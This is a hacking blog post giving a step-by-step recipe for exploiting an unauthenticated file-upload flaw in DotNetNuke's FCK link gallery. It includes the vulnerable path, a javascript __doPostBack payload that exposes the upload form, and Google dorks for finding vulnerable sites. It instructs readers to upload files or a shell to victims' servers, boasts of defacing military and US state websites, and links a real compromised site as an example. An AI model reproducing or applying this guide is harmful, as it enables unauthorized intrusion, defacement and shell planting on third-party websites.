Dnn hacking

This BUG Find by pakistani Researchers
DNN(DotNetNuke) Gallery All Version Remote File Upload without Authentication
Bug Found by HARIS KHan
Date of finding bug : 2008/05/5
Over 10 military website and 20 state of United State of america Defaced by this bug Tongue
Find DNN path then go to this file

Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Select : File ( A File On Your Site )
after Loading then Put this Code instead URL

Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0

Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell 


Here is the way of hacking site by portal.....

Step 1 :

Code:
WwW.Google.CoM

Step 2:- Now enter this
Code:
:inurl:/tabid/36/language/en-US/Default.aspx

Code:
inurl:"portals/0/"

this is a dork to find the Portal Vulnerable sites, use it wisely

Step 3:- U will find many sites, Select the site which you are comfortable with.

Step 4:- For example take this site.



Step 5:
- Now replace

Code:
/Home/tabid/36/Language/en-US/Default.aspx

with

this

Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:- You will get a Link Gallary page.So far so good!

Step 7:
- Dont do anything for now, FINAL stage APPROACHING.

Step 8:-Now replace the URL in the address bar with a Simple Script


Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:-You will Find the Browse and Upload Option

Step 10:-Upload your package 

Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....

Congrats You just hacked a site..Tongue

Code:
http://www.essegielle.it/portals/0/2.swf
BY HaRis
Dnn hacking Dnn hacking Reviewed by Don't Play on 23:08:00 Rating: 5

No comments:

'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();
Powered by Blogger.